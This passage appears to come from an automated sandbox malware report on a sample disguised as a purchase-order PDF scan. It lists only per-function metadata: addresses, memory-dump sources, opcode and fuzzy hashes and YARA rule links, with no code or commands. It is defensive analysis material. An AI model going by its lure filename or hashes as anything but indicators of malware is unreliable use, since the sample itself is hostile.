Opcode Fuzzy Hash: 852ccf755a4bbaad36133f643861a611604565a1c7247911c4d3c8e24209d671
Instruction Fuzzy Hash: C091D575E10218DFDB14CFAAD884ADDBBF2BF89311F148069E409AB365EB349945CF50

Function 0152CCD8 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a424f8f35baaaec36d6d68de669ec4e606f169d38c71803d33d01acc604726e6
Instruction ID: 41cdbce4c29fe104528ba69d6c8082c940def040f00f1bdb4945b386d8dce152
Opcode Fuzzy Hash: a424f8f35baaaec36d6d68de669ec4e606f169d38c71803d33d01acc604726e6
Instruction Fuzzy Hash: 9781C375E00218DFEB14DFAAD884A9DBBF2BF89300F14C16AE819AB365DB305941CF51

Function 0152C468 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f45e153f41147047063b60c403896219613714516976c6be7f1a934b4a8eb99b
Instruction ID: 4c02b09a940db37cb26c8268a8fc779056f845a1b103b7deba865bb14bda5fb0
Opcode Fuzzy Hash: f45e153f41147047063b60c403896219613714516976c6be7f1a934b4a8eb99b
Instruction Fuzzy Hash: EC81C675E00618DFEB14DFAAD944A9DBBF2BF89300F14C16AE419AB365DB30A941CF50

Function 0152CA08 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b94062360c6760b19de99a4bbc6d0d76cfca31579bf48aa4fcff63ae486c397d
Instruction ID: 6d8aa9be7810c04f9b3c97556c5e6ca0ec119dd85343da14fd4c2a7e841882d9
Opcode Fuzzy Hash: b94062360c6760b19de99a4bbc6d0d76cfca31579bf48aa4fcff63ae486c397d
Instruction Fuzzy Hash: AA81C575E00618CFEB14DFAAD844A9DBBF2BF89310F14C16AE819AB365DB305941CF51

Function 0152D278 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e314216d737eaea5834c5d15628b66c593c332bf03780883b01a748e9d24f6df
Instruction ID: fbfd9e90873b01ed146578e4e2ede577bf0111914c3adcc28816d31ddb8501c7
Opcode Fuzzy Hash: e314216d737eaea5834c5d15628b66c593c332bf03780883b01a748e9d24f6df
Instruction Fuzzy Hash: 5781C5B5E00218CFEB54DFAAD884A9DBBF2BF89300F14C069E419AB365DB745941CF50

Function 0152C738 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2889b61ee798f9faed80328eb7da4da823260659d8a58104a3f0676ee49e9f24
Instruction ID: 4c27eaef77d85b9ff2e3ee89b285f4d49beb1deb5d991fb3d4b368344fdac1d2
Opcode Fuzzy Hash: 2889b61ee798f9faed80328eb7da4da823260659d8a58104a3f0676ee49e9f24
Instruction Fuzzy Hash: ED81B375E00218DFEB14DFAAD984A9DBBF2BF89300F14C06AE419AB365DB709941CF51

Function 0152CFAC Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8664ddd0d3d977a32c3eaadebc4bcd1439f00515cc276244801447460c94c939
Instruction ID: da7ab558a4f7d3ad99eb2ebd57fa72ffb84a717653472d605033f1cbc9ada7a1
Opcode Fuzzy Hash: 8664ddd0d3d977a32c3eaadebc4bcd1439f00515cc276244801447460c94c939
Instruction Fuzzy Hash: D581B575E00218CFEB54DFAAD984A9DBBF2BF89300F24C069E419AB365DB349941CF51

Function 0152E97C Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffca3a5737acc6760a7d7de9eec27c7537c257ca4f71ba4c8b43c29e86cfb725
Instruction ID: 78bde544aec7b87eba8a877c5ea67863ddfa36088ddb4d8c452e7abd7bf473c0
Opcode Fuzzy Hash: ffca3a5737acc6760a7d7de9eec27c7537c257ca4f71ba4c8b43c29e86cfb725
Instruction Fuzzy Hash: 7A519975E00218DFDB18DFAAD544A9DBBB2FF89310F14D12AE815AB365DB315842CF14

Function 0152E988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e70d4bee9da02c79a302abdb1bc473825a968b25c9013f4c90f481d65ec2bcc6
Instruction ID: 77e5dd808d803d3d29243eb4ce881153953558f4b20ef7465024a204ab73f776
Opcode Fuzzy Hash: e70d4bee9da02c79a302abdb1bc473825a968b25c9013f4c90f481d65ec2bcc6
Instruction Fuzzy Hash: B2518575E00218DFDB18DFAAD594A9DBBB2FF89700F249029E815AB3A4DB315842CF14

Function 05C6992C Relevance: 1.6, APIs: 1, Instructions: 62
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 05C69A6E

Memory Dump Source

Source File: 00000008.00000002.3896059789.0000000005C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_5c60000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 16336c1b1410933c850ebba24afe6379955b00db17103661b8d07783aeee173e
Instruction ID: 2f7a5075abc85751fee2f766aab56a029ae01386e98d7ae75b6fc9aed8755bac
Opcode Fuzzy Hash: 16336c1b1410933c850ebba24afe6379955b00db17103661b8d07783aeee173e
Instruction Fuzzy Hash: 84115978E042098FDB14DBA9D8C4EADB7F5FF88304F148565E848E7242D770DA42CB50

Function 0152AEF0 Relevance: 1.5, Strings: 1, Instructions: 210
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8, xrefs: 0152AF80

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: 22a5ce9f8b56bb50999ea6de6d3369d4818485c2136439f202a580231c06687b
Instruction ID: b7b8ba4df8e0689296ec56b82965a7513a4f22c488af9946913e6a781c78c016
Opcode Fuzzy Hash: 22a5ce9f8b56bb50999ea6de6d3369d4818485c2136439f202a580231c06687b
Instruction Fuzzy Hash: 9F71D176B002148FDB15CF68C844AAEBBB6BFC9210F248569E526DB3D5DB349C06CB90

Function 0152E007 Relevance: .7, Instructions: 655
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e41454a22b9422e5bd1cdc7a9dcc880f6018ca6f55df1107acd3b1696a3ceb1a
Instruction ID: 0b53e13cd91c8c0420d0a83301117621f7c46e92ba37858819107520b9910395
Opcode Fuzzy Hash: e41454a22b9422e5bd1cdc7a9dcc880f6018ca6f55df1107acd3b1696a3ceb1a
Instruction Fuzzy Hash: A0129A3C0212429FE6606B38F5AE16EBB70FB4F32B7066C45E16F8945DDB78044DAB61

Function 0152E018 Relevance: .6, Instructions: 647
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14b48633b17f0724e579702237317be1e880560236d1f3bfc0f3861e3ba463b9
Instruction ID: aa69ff355d4739cb2ecc82baafc240281800d4616d15b1345b7296bb377f22c4
Opcode Fuzzy Hash: 14b48633b17f0724e579702237317be1e880560236d1f3bfc0f3861e3ba463b9
Instruction Fuzzy Hash: 3412993C0212429FA6606B38F5AE16EBB71FB4F32B7066C41E12F8944DDB78044DAB61

Function 01520C8F Relevance: .6, Instructions: 552
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7472a08890144bd4075cf8f8128855a1ba3e850593fa0047409965c10c81afd
Instruction ID: 54c9ceb795dcd9ca13ca2718b518783c46c325c2fdad636d4ca26c427a98a300
Opcode Fuzzy Hash: b7472a08890144bd4075cf8f8128855a1ba3e850593fa0047409965c10c81afd
Instruction Fuzzy Hash: CF620B74A01219CFCB64DF25E984A9DBBB2FB8C305F1046A5D819AB354DF346E85CF81

Function 01520CA0 Relevance: .5, Instructions: 539
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9d3cc2dd9dd2e415e9ef2d25d8707ad34963a723a7bae5139f457cb9263603d
Instruction ID: 48eff03d7fac274b822f75d05121991563b1fb3e9533b8312f096d20510bd98d
Opcode Fuzzy Hash: f9d3cc2dd9dd2e415e9ef2d25d8707ad34963a723a7bae5139f457cb9263603d
Instruction Fuzzy Hash: FF520A74A01219CFCB64DF25E984A9DBBB2FB8C305F1046A5D819AB354DF346E85CF81

Function 015276F1 Relevance: .5, Instructions: 483
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eee7c234432c0d0399e56e1015aceba84553537c19e7423bb9eea721b765f550
Instruction ID: 46923dd62cd3dc20d1df947e9bf0df53d2fdca7167dbea74e272257711fdf44c
Opcode Fuzzy Hash: eee7c234432c0d0399e56e1015aceba84553537c19e7423bb9eea721b765f550
Instruction Fuzzy Hash: 5B127A32A002698FDB15CF68C884A9EBBF1FF9A314F148599E915EF2A1D730ED41CB50

Function 01525F38 Relevance: .3, Instructions: 327
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 754af5f44ba63c971827bdafe34df9d6d7d9fe11d41f431648d47321b0ab5982
Instruction ID: 95249f55ab3c39535e57b5ee673998204523e1aca59fd8f6876df7f061013951
Opcode Fuzzy Hash: 754af5f44ba63c971827bdafe34df9d6d7d9fe11d41f431648d47321b0ab5982
Instruction Fuzzy Hash: C5B1AB367042218FDB269B298854B6E7BF2BF8A204F148969E816CF2D6DB34DC41D791

Function 01526498 Relevance: .2, Instructions: 235
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33b321959f6960f36e8391f4513381392914f2ce4a4167c20b757cb658c6861c
Instruction ID: 621fd72e843277a25638a53dd40416eecd19c78a9bf4cea0148839a83b7f6d29
Opcode Fuzzy Hash: 33b321959f6960f36e8391f4513381392914f2ce4a4167c20b757cb658c6861c
Instruction Fuzzy Hash: 43917C36A00525CFDB24CF6DC89896DBBF2BF8A214F148569D905EB3A5DB31E841CB90

Function 01529A2C Relevance: .2, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70723cc53a8a7d10758868544efb8ce6cd1a17ae595bf9b4f60df8e727cb0c5b
Instruction ID: 28b76e9b9c1d627fa7795db86625fb947137b9ac9005d156be0fb021a0b97793
Opcode Fuzzy Hash: 70723cc53a8a7d10758868544efb8ce6cd1a17ae595bf9b4f60df8e727cb0c5b
Instruction Fuzzy Hash: 7F91F9329057658FCB11CF2CC88459ABBF5FF82314F5585AAD958DB392C331E815CBA1

Function 015280D8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d2d8886062d103d190ad6f3bc510f3c6063be48b7f5e44394b5b17d8b4050d0
Instruction ID: fe2fda4ce8ba8eeeedd89e961217353a334761379db39f0b6940a4ace1d37d51
Opcode Fuzzy Hash: 4d2d8886062d103d190ad6f3bc510f3c6063be48b7f5e44394b5b17d8b4050d0
Instruction Fuzzy Hash: 71711635700A258FDB25DFA8C884A6E7BE6BF8B304B1544A9E916DF3A1DB70DC41CB50

Function 0152F71F Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49a01dbdaf86054117470b3fcdaf398c29eef7f49efb74d77bf548146acf20d5
Instruction ID: 2e6050411cae446feaca3ef530744eaa31aab6b5947189e28d96cf9abb904c30
Opcode Fuzzy Hash: 49a01dbdaf86054117470b3fcdaf398c29eef7f49efb74d77bf548146acf20d5
Instruction Fuzzy Hash: A0610474D00318DFEB14CFA9D958BADBBB2FF89300F60852AD805AB294DB355946DF40

Function 0152D548 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1de3d079b70a416e654e2bf6eea0afa21392bb3c291eb0d5b7aa197d4738b336
Instruction ID: fd0a981e9eefadbb4018fa2c1503f3930217bc583372609612fc4981de87f236
Opcode Fuzzy Hash: 1de3d079b70a416e654e2bf6eea0afa21392bb3c291eb0d5b7aa197d4738b336
Instruction Fuzzy Hash: 7D51A674E01218DFDB54DFAAD58499DBBF2FF89700F208169E409AB365DB309901CF10

Function 015241A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12419f1c296bcff827438ed51f541766cf8e9d1c41bc2fed7da11f9905553533
Instruction ID: 01eec84afa7b4fc323fc7962d051f175b9e979f77cb3d7e48be810894696f2f4
Opcode Fuzzy Hash: 12419f1c296bcff827438ed51f541766cf8e9d1c41bc2fed7da11f9905553533
Instruction Fuzzy Hash: 66519375E01218DFCB08DFAAD58499DBBF2FF89300B208469E805AB364DB35AD42CF50

Function 0152A303 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7643838b026ab0e30d7076fdfc4be5861ca295e0291a884795bf4215ce31c2da
Instruction ID: 98013b652d3aabdee9fad443bbdb01601ec6cda3a045a3a9f3acd9cfcf6e421c
Opcode Fuzzy Hash: 7643838b026ab0e30d7076fdfc4be5861ca295e0291a884795bf4215ce31c2da
Instruction Fuzzy Hash: 0C41C132A00269DFDF12CFA8C844A9DBFF2BF8A310F048555E9559F6A2D374D914CB90

Function 01528EF8 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4ab8bfd3c651bf00862cbf931ad446bb9d99b6f2d79ee60b83cb1b4a5ffd761
Instruction ID: da14ac5ce26bfeb7a55a4364b7138d6460e3ae90ae5613debb8cddf32e341062
Opcode Fuzzy Hash: e4ab8bfd3c651bf00862cbf931ad446bb9d99b6f2d79ee60b83cb1b4a5ffd761
Instruction Fuzzy Hash: 4431A8323042718FD7368BA98850A7E7BE6FF86615B15445AE122CF2D3EA39CC808755

Function 01529C30 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e363d346ba3d97484dc1593483e5f880376228d81ca264ba2c6b5c5def080ba
Instruction ID: a0e33dec561517c9950ae0767b0fe63a3f458716651344bfe04166cfed4f10b1
Opcode Fuzzy Hash: 2e363d346ba3d97484dc1593483e5f880376228d81ca264ba2c6b5c5def080ba
Instruction Fuzzy Hash: 0C418F316042658FDB02CB2CC844B6E7BE6FB8A319F548466E918CF3A6D771DC05DB61

Function 01525658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e059746027ec36ee69854f50f0d8ab4a44eec55ff2ef72753da24d90dbf841bb
Instruction ID: 46bb60b8c0ed4a52837b6628dce640d7ece285434407ae7caca29eb92c58d368
Opcode Fuzzy Hash: e059746027ec36ee69854f50f0d8ab4a44eec55ff2ef72753da24d90dbf841bb
Instruction Fuzzy Hash: 74311436200119DFCF129FA9E844AAE3BB2FB58345F008429F9158F294DB35DD65DBA0

Function 01528370 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e09ee9084cd0705f20ad969df2b85a6c4fd380db8c3509e51170038ef285f78
Instruction ID: 442fb4411f1984c916bc64d82474e121ae9dd1bed61c80397ea06cf120c064b3
Opcode Fuzzy Hash: 3e09ee9084cd0705f20ad969df2b85a6c4fd380db8c3509e51170038ef285f78
Instruction Fuzzy Hash: 2A21F6323042718FDB265BA98858A3E3BE6BFC665C704402ED502CF3E6EA35C805E3C1

Function 01529920 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9536d41c8935fe65ae9d317e60f04b65655e02413df000b265a030daeba6bc1d
Instruction ID: 3e53bb3a142060e509cbb43111c05c0d94d43c4b114af7c9e4b9b9ec6a57c970
Opcode Fuzzy Hash: 9536d41c8935fe65ae9d317e60f04b65655e02413df000b265a030daeba6bc1d
Instruction Fuzzy Hash: C631B032605A725BC314CB2DC880555BB65BE8337CB15875AC5B88F7D6C731E852C7E0

Function 01522790 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76423c3aa8ef8947fb15c99d241682c395c2739a0d392f1272dc16c3c29f3994
Instruction ID: fb62a71bbddd617ba40e365ea75d19bd587fe030dccb00d952a080b6ec6142c3
Opcode Fuzzy Hash: 76423c3aa8ef8947fb15c99d241682c395c2739a0d392f1272dc16c3c29f3994
Instruction Fuzzy Hash: AA315878D0935A8FCB01DFA8D8445EEBFF4FB4A304F04416AD405AB264EB340A45CB61

Function 01528380 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fbdd7106976bd10032357b16821f125f9f1b18e5ec18dbb66853a1237808038
Instruction ID: 616aa9e56df0cebd310ae9bb9e2acf0882bc2c3a4a14831e4627cad9614698f0
Opcode Fuzzy Hash: 0fbdd7106976bd10032357b16821f125f9f1b18e5ec18dbb66853a1237808038
Instruction Fuzzy Hash: 6621C1323002218BEB255BA98454B3E76D6BFC661DF14803DD502CF3D9EA76C842A3C1

Function 015228F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8626fa63d51c0eece4db01495c78699c7629529ef3adf224f14e2d68256c0446
Instruction ID: bb34502ad67bdf32f244085d50e61d52738d4a0a1a9b6c18a96c1e8788267bbd
Opcode Fuzzy Hash: 8626fa63d51c0eece4db01495c78699c7629529ef3adf224f14e2d68256c0446
Instruction Fuzzy Hash: 4F219076B00115EFCF15DB28C8409AE37A5FB9E2A0F10C45DD8099B290DB76EE86CBD1

Function 014CD554 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880326831.00000000014CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_14cd000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19471b790b181ef4405289321bc749aba434a13da9fb0c520fe31bddfca10506
Instruction ID: f62c4b5e020a65a45b4036cf1a4e75a9e80ac85dbf770d40f1f07010a322a396
Opcode Fuzzy Hash: 19471b790b181ef4405289321bc749aba434a13da9fb0c520fe31bddfca10506
Instruction Fuzzy Hash: 5321F179A04240DFDB45DF94D9C0B27BB65FB98A24F20C57EE8090A366C336D456CAE2

Function 01526300 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29b1c73c5a30bf7c2db134f5a915bf59d7a726e5a81bfb62f4047532a1358312
Instruction ID: 7381cc0a645669d6933247c9f0fdd20d1f843fa97cbb17bd53d7f4e7a249f2d9
Opcode Fuzzy Hash: 29b1c73c5a30bf7c2db134f5a915bf59d7a726e5a81bfb62f4047532a1358312
Instruction Fuzzy Hash: BF21C33A3005219FD7259B2AC46492EB7A2FF9A7557154429ED16CF394CF31DC028BD0

Function 014DD044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880431828.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_14dd000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3fccd8ca010f70f749bdee460037ca8b538e00faf84a94a697b445af0e5172f
Instruction ID: e8653a57ac5bb936c4927697605a1db9c282fc5c62c293c0d7f7f08f173fc23f
Opcode Fuzzy Hash: a3fccd8ca010f70f749bdee460037ca8b538e00faf84a94a697b445af0e5172f
Instruction Fuzzy Hash: B02103B1A043049FDF16DF64C894B16BBA5FBC4318F20C56EE9490B3A2C736D447CA62

Function 01525649 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f675e998f2360b0225f5b300ff7dfa9ca3bc0508e8a9f964309e6acb71495f8f
Instruction ID: 4d9e12a9921948f273292ac99364d71d9fc01bda2596910ad3e50699eadc51da
